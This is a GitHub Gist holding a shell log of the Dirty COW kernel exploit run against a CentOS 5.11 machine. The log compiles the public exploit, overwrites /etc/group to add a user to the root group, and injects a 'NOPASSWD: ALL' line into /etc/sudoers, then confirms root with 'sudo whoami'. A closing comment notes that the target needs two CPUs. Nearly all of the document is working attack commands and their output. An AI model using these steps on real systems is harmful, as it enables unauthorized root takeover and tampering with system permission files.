Last active
October 19, 2018 00:50
-
-
Save milo2012/a7ddbd16c1068d42a85688e2884618b1 to your computer and use it in GitHub Desktop.
dirtycow (dirtyc0w)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ git clone https://github.com/dirtycow/dirtycow.github.io/ | |
| $ cd dirtycow.github.io | |
| $ gcc -lpthread pokemon.c -o pokemon | |
| $ cat /etc/issue | |
| CentOS release 5.11 (Final) | |
| Kernel \r on an \m | |
| $ uname -r | |
| 2.6.18-398.el5 | |
| $ uname -a | |
| Linux localhost.localdomain 2.6.18-398.el5 #1 SMP Tue Sep 16 20:50:52 EDT 2014 x86_64 x86_64 x86_64 GNU/Linux | |
| $ grep -c ^processor /proc/cpuinfo | |
| 2 | |
| $ ./pokemon /etc/group "$(sed '/\(root*\)/ s/$/,milo/' /etc/group)" | |
| $ echo "milo ALL=(ALL) NOPASSWD: ALL ##" > /tmp/out | |
| $ cat /etc/sudoers | |
| root ALL=(ALL) ALL | |
| $ ./pokemon /etc/sudoers "$(cat /tmp/out)" | |
| (___) | |
| (o o)_____/ | |
| @@ ` \ | |
| \ ____, /milo ALL=(ALL) NOPASSWD: ALL | |
| // // | |
| ^^ ^^ | |
| mmap 2b913021e000 | |
| ptrace 0 | |
| madvise 0 | |
| $ cat /etc/sudoers | |
| milo ALL=(ALL) NOPASSWD: ALL | |
| root ALL=(ALL) ALL | |
| $ sudo whoami | |
| root |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Target needs to have 2 CPU for the exploit to works. Refer to http://seclists.org/oss-sec/2016/q4/246 for more information